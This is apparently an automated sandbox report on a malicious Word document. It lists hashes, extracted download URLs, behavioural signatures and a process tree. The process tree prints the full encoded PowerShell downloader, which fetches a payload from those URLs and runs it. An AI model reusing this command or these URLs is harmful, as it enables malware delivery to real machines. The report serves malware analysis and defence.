Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 23:53
Behavioral task
behavioral1
Sample
eeae7980dd787e0cc804bebef92ed930_JaffaCakes118.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
eeae7980dd787e0cc804bebef92ed930_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
eeae7980dd787e0cc804bebef92ed930_JaffaCakes118.doc
-
Size
174KB
-
MD5
eeae7980dd787e0cc804bebef92ed930
-
SHA1
9d5b11349e1f297468bdc9cf62620e3888673fdd
-
SHA256
af0e40cc260afaf98685419c7a7e2a7bb5071876da22daeafb069c208b8a9ff1
-
SHA512
d7502f4da62345c51d99906921c5b9a8d18faa406c4e43dfa93b9de3dac85dd9b16593ff3d72a777e4509e05b45f8aaf73f6b8c0d37ddb61b8c5037b341964b0
-
SSDEEP
1536:trdi1Ir77zOH98Wj2gpngx+a9xGmLtHuJ:trfrzOH98ipgJFuJ
Malware Config
Extracted
https://haikouweixun.com/jn5/Rbp/
http://carolinacanullo.com/js/hllPT/
http://megasolucoesti.com/R9KDq0O8w/B3KqPpe/
http://www.insulution.org/wp-admin/swift/swift/y318LGM/
http://petafilm.com/calendar/6kOpwrt/
https://dev.contractdevs.co.uk/hbbny/Kv9/
http://blog.penmman.com/wp-content/uploads/1ECbn9K/
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2724 powershell.exe 10 2724 powershell.exe 15 2724 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\TypeLib\{99E6B681-D853-4345-80A5-522DD37AB611}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\TypeLib\{99E6B681-D853-4345-80A5-522DD37AB611}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{99E6B681-D853-4345-80A5-522DD37AB611}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{99E6B681-D853-4345-80A5-522DD37AB611}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{99E6B681-D853-4345-80A5-522DD37AB611}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{99E6B681-D853-4345-80A5-522DD37AB611}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\TypeLib\{99E6B681-D853-4345-80A5-522DD37AB611}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2476 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2724 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2476 WINWORD.EXE 2476 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2476 wrote to memory of 2688 2476 WINWORD.EXE 35 PID 2476 wrote to memory of 2688 2476 WINWORD.EXE 35 PID 2476 wrote to memory of 2688 2476 WINWORD.EXE 35 PID 2476 wrote to memory of 2688 2476 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeae7980dd787e0cc804bebef92ed930_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABOAGwAcAA3AGoAegBqAD0AKAAnAFUAegAnACsAKAAnAGwAaQAnACsAJwBwADYAYQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBmAGkAbABFAFwAWgAxAGgARgAxADMAQwBcAGoAUQA4AE0AXwA0ADUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAFIAZQBjAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAQwB1AGAAUgBpAHQAWQBQAFIAbwBUAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAHQAbABzADEAJwArACcAMgAnACkAKwAoACcALAAgAHQAJwArACcAbABzACcAKwAnADEAMQAnACkAKwAoACcALAAgAHQAJwArACcAbAAnACkAKwAnAHMAJwApADsAJABLADcAcAA3ADIAcAB6ACAAPQAgACgAJwBSACcAKwAnAHUAJwArACgAJwA2AG8AagByADEAaQAnACsAJwByACcAKQApADsAJABCAGQAbABqAHEAdwBiAD0AKAAoACcASgBwACcAKwAnAF8AJwApACsAKAAnADQAJwArACcAdQBrAHIAJwApACkAOwAkAFoAdABtAHEAdQBpAHcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAUwBvACcAKwAnADUAJwArACgAJwBaACcAKwAnADEAaABmADEAJwArACcAMwAnACsAJwBjAFMAbwA1ACcAKwAnAEoAcQAnACsAJwA4AG0AXwA0ADUAUwAnACkAKwAnAG8ANQAnACkALgAiAHIAYABlAHAAbABgAEEAQwBlACIAKAAoACcAUwAnACsAJwBvADUAJwApACwAWwBzAHQAcgBJAE4ARwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAEsANwBwADcAMgBwAHoAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABKAGEAcgA1AGcAdABwAD0AKAAoACcAUgBwADkAJwArACcAcQAyACcAKwAnAGMAJwApACsAJwB3ACcAKQA7ACQATABmADMAcABwAHcAZgA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAGUAYgBDAEwASQBlAE4AVAA7ACQASwBvAGUAMQBlADUAMgA9ACgAKAAnAGgAdAB0AHAAJwArACcAcwA6ACcAKQArACgAJwAvAC8AaAAnACsAJwBhACcAKwAnAGkAawBvAHUAJwApACsAKAAnAHcAZQBpAHgAJwArACcAdQAnACkAKwAoACcAbgAnACsAJwAuAGMAJwArACcAbwBtAC8AagAnACkAKwAoACcAbgAnACsAJwA1AC8AJwApACsAJwBSACcAKwAoACcAYgBwACcAKwAnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvAC8AYwBhAHIAJwArACcAbwBsAGkAJwApACsAJwBuACcAKwAoACcAYQBjACcAKwAnAGEAJwArACcAbgB1AGwAJwApACsAKAAnAGwAbwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvAGoAJwArACcAcwAvAGgAJwArACcAbABsAFAAJwArACcAVAAvACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAnACsAJwAvAC8AbQAnACkAKwAnAGUAJwArACcAZwAnACsAKAAnAGEAJwArACcAcwBvACcAKwAnAGwAdQBjAG8AZQBzACcAKQArACcAdAAnACsAKAAnAGkALgBjAG8AbQAvAFIAJwArACcAOQBLACcAKQArACgAJwBEAHEAMABPADgAdwAnACsAJwAvAEIAJwArACcAMwAnACkAKwAoACcASwAnACsAJwBxAFAAcABlAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcAAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAdwAnACkAKwAoACcAdwAnACsAJwB3AC4AJwApACsAKAAnAGkAJwArACcAbgBzAHUAbAAnACkAKwAnAHUAJwArACcAdABpACcAKwAoACcAbwAnACsAJwBuAC4AbwByAGcAJwApACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGEAJwArACgAJwBkAG0AJwArACcAaQAnACkAKwAnAG4AJwArACcALwBzACcAKwAoACcAdwAnACsAJwBpAGYAJwApACsAKAAnAHQALwAnACsAJwBzAHcAaQBmAHQAJwApACsAJwAvACcAKwAoACcAeQAzADEAJwArACcAOABMACcAKQArACgAJwBHACcAKwAnAE0ALwAqAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHAAZQB0ACcAKwAnAGEAJwApACsAJwBmACcAKwAoACcAaQAnACsAJwBsAG0ALgAnACkAKwAnAGMAJwArACgAJwBvAG0ALwBjAGEAbABlAG4AZABhACcAKwAnAHIALwAnACsAJwA2ACcAKQArACcAawAnACsAKAAnAE8AcAB3AHIAdAAvACcAKwAnACoAJwArACcAaAAnACkAKwAnAHQAJwArACgAJwB0ACcAKwAnAHAAJwArACcAcwA6AC8ALwAnACkAKwAnAGQAJwArACcAZQAnACsAKAAnAHYALgBjAG8AbgB0AHIAJwArACcAYQBjAHQAZAAnACsAJwBlAHYAcwAuACcAKwAnAGMAbwAnACkAKwAnAC4AdQAnACsAKAAnAGsALwAnACsAJwBoACcAKQArACcAYgAnACsAKAAnAGIAbgB5AC8AJwArACcASwAnACsAJwB2ADkALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8ALwAnACsAJwBiAGwAJwApACsAJwBvACcAKwAnAGcALgAnACsAKAAnAHAAJwArACcAZQBuAG0AbQAnACsAJwBhAG4ALgBjAG8AJwArACcAbQAnACkAKwAoACcALwB3AHAALQBjACcAKwAnAG8AJwArACcAbgB0ACcAKQArACcAZQAnACsAKAAnAG4AdAAvACcAKwAnAHUAJwApACsAKAAnAHAAJwArACcAbABvACcAKQArACgAJwBhAGQAcwAvADEARQBDACcAKwAnAGIAbgA5ACcAKwAnAEsAJwApACsAJwAvACcAKQAuACIAcwBQAGAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABLAHMAdwBmADUAcwBqAD0AKAAoACcARgBfAHMAdwAnACsAJwA1ACcAKQArACcANwBhACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEYAbgBvADUAZQBxAHcAIABpAG4AIAAkAEsAbwBlADEAZQA1ADIAKQB7AHQAcgB5AHsAJABMAGYAMwBwAHAAdwBmAC4AIgBEAG8AYAB3AG4ATABgAG8AYQBEAGYAaQBgAEwAZQAiACgAJABGAG4AbwA1AGUAcQB3ACwAIAAkAFoAdABtAHEAdQBpAHcAKQA7ACQAWABnAGQAegAyAHgAdgA9ACgAKAAnAFIAaAB2AGEAJwArACcAegB3ACcAKQArACcAegAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgB0AG0AcQB1AGkAdwApAC4AIgBsAGUAbgBgAGcAdABIACIAIAAtAGcAZQAgADIANQA4ADgAMAApACAAewAuACgAJwBJAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdAAnACsAJwBlAG0AJwApACgAJABaAHQAbQBxAHUAaQB3ACkAOwAkAFUAbwBjAHkAbABpADYAPQAoACcAVQB4ACcAKwAoACcAaABhADUAJwArACcAawA1ACcAKQApADsAYgByAGUAYQBrADsAJABKAHQAdgAwADgAcQAzAD0AKAAnAEIAJwArACgAJwByAHcAJwArACcAOQBpAGEAdgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgAzAGIAcwA5ADkAdwA9ACgAJwBHADkAJwArACcAMABhACcAKwAoACcAbwB0ACcAKwAnADUAJwApACkA1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD54eda7fd3cf3baccdb367b6ac79fbf2c4
SHA126924a83f2f7654c4e9bb39cdd84a925c1616f4d
SHA256b190bc433e172b89bf72522ee0acd23ce0d9e55259fc8bf8b7668d2b0a7a1618
SHA512d0031903dc55831a7c2a69701076fd962d3829f8f5e83c3d442302c9f9d570e12aaf3274e54119d076f4d57eaeaa4a874bc33190858936c7ddd2a23b0c3a3990